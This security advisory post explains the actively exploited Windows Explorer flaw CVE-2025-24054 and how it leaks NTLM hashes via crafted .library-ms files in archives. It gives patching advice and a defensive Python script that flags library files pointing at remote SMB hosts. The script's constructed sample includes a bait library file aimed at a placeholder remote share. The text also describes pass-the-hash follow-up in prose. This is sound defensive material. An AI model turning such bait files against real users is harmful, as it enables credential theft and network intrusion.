Heads up for all Windows users and IT administrators: a significant vulnerability in Windows File Explorer is being actively exploited by attackers. This vulnerability, now tracked as CVE-2025-24054, was initially assigned the identifier CVE-2025-24071.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added this flaw to its Known Exploited Vulnerabilities (KEV) catalog, signaling that it is a clear and present danger.
Here’s what you need to know to protect yourself.
What is CVE-2025-24054?
CVE-2025-24054 is a high-impact spoofing and sensitive information disclosure vulnerability in Windows File Explorer. It allows an attacker to steal a user’s NTLM hash, which is a hashed version of their Windows password.
The vulnerability is particularly dangerous because it requires very little user interaction—no clicking on strange executables or ignoring security warnings. The simple act of extracting a malicious ZIP or RAR archive is enough to trigger the exploit.
How Does the Attack Work?
The attack chain is both clever and alarming:
- Delivery: An attacker sends a user a seemingly harmless archive file (like a .zip or .rar) via a phishing email or a malicious download.
- The Bait: Inside this archive is a specially crafted file with a .library-ms extension. These are normally benign Windows Library files.
- The Trap: This malicious .library-ms file contains a path pointing to an SMB server controlled by the attacker.
- The Exploit: When the user extracts the archive, Windows File Explorer’s preview or indexing mechanism automatically parses the .library-ms file to gather information. This action, which happens in the background without the user even opening the file, causes the system to automatically try to authenticate with the attacker’s SMB server.
- Theft: This authentication attempt sends the user’s NTLMv2 hash directly to the attacker.
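The bait in the chain above is a Windows Library file whose location entry points at a remote share, so one useful check on the defender side is to triage incoming archives for exactly that before anyone extracts them. The following Python is an added example written for this post (not code from Microsoft, CISA, or the original author): it reads the documented .library-ms XML layout (libraryDescription / searchConnectorDescription / simpleLocation / url), flags any UNC location whose host is not on an allow-list of known internal file servers, and walks a ZIP attachment. The sample archive, the host names and the allow-list are constructed for the example.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# UNC locations in either backslash or forward-slash form: \\host\share or //host/share
UNC_RE = re.compile(r"^(?:\\\\|//)([^\\/]+)[\\/]")

def library_locations(xml_bytes: bytes) -> list[str]:
    """Return every <url> location in a .library-ms file (empty if it is not valid XML)."""
    try:
        root = ET.fromstring(xml_bytes)
    except ET.ParseError:
        return []
    # Match the local name so files with or without the library namespace are handled.
    return [el.text.strip() for el in root.iter()
            if el.tag.rsplit("}", 1)[-1] == "url" and el.text]

def remote_hosts(xml_bytes: bytes, allowed_hosts=()) -> list[str]:
    """Hosts that Explorer would try to contact (UNC locations not on the allow-list)."""
    allowed = {h.lower() for h in allowed_hosts}
    hosts = []
    for loc in library_locations(xml_bytes):
        m = UNC_RE.match(loc)
        if m and m.group(1).lower() not in allowed:
            hosts.append(m.group(1).lower())
    return hosts

def triage_zip(zip_bytes: bytes, allowed_hosts=()) -> dict[str, list[str]]:
    """Map each .library-ms entry in the archive to the off-allow-list hosts it references."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            if name.lower().endswith(".library-ms"):
                hosts = remote_hosts(zf.read(name), allowed_hosts)
                if hosts:
                    findings[name] = hosts
    return findings

# Constructed sample data: a stock-looking library pointing at a known folder,
# and one whose location is a remote share on a placeholder host.
BENIGN_LIB = b"""<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <searchConnectorDescriptionList><searchConnectorDescription>
    <simpleLocation><url>knownfolder:{FDD39AD0-238F-46AF-ADB4-6C85480369C7}</url></simpleLocation>
  </searchConnectorDescription></searchConnectorDescriptionList>
</libraryDescription>"""
SUSPECT_LIB = BENIGN_LIB.replace(
    b"knownfolder:{FDD39AD0-238F-46AF-ADB4-6C85480369C7}", b"\\\\fileshare.example.invalid\\docs")

def build_sample_zip() -> bytes:
    """Constructed attachment: one benign and one suspicious library next to a text file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Invoice/Documents.library-ms", BENIGN_LIB)
        zf.writestr("Invoice/Q1 Report.library-ms", SUSPECT_LIB)
        zf.writestr("Invoice/readme.txt", b"constructed sample")
    return buf.getvalue()
```

Run `triage_zip(build_sample_zip(), allowed_hosts=["corp-fs01"])` at a mail gateway or sandbox to list which entries would make Explorer reach out to an unknown host; a hit is worth quarantining regardless of patch status, and a match against an allow-listed internal server is expected for genuine library files.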
What’s the Impact of a Stolen NTLM Hash?
An NTLM hash is not the user’s plaintext password, but it’s the next best thing for an attacker. With this hash, an attacker can:
- Offline Cracking: Use powerful computers to “crack” the hash and discover the original plaintext password.
- Pass-the-Hash (PtH) Attacks: In many network environments, an attacker can use the hash itself (without ever knowing the password) to impersonate the user and move laterally through a network, accessing other machines and servers.
This makes the vulnerability a critical entry point for wider network compromise.
Who is Affected?
This vulnerability affects a wide range of Microsoft products, including:
- Windows 10 (various versions)
- Windows 11 (various versions)
- Windows Server 2016, 2019, and 2022
Given the broad range of affected systems, it is safe to assume all modern Windows clients and servers are at risk until patched.
How to Protect Yourself: Patch Immediately
The solution is straightforward and urgent: Apply the security updates released by Microsoft during the March 2025 Patch Tuesday.
Microsoft has addressed this vulnerability, and installing the latest Windows updates is the only way to fully mitigate the threat.
Due to its inclusion in the CISA KEV catalog, this is not a patch to be delayed. Attackers are actively using this exploit, and any unpatched system is a target.
Steps to Take:
- Prioritize Patching: Use Windows Update or your organization’s patch management system to deploy the March 2025 (or later) security updates immediately.
- Educate Users: Remind users to be extremely cautious of unsolicited ZIP or RAR attachments, even if they appear to come from a known source.
- Monitor for Suspicious Activity: Security teams should monitor for unusual outbound SMB traffic (TCP port 445) from workstations, as this could be a sign of an attempted exploit.
Don’t wait for a compromise. The threat is active, and the solution is available. Patch your systems now.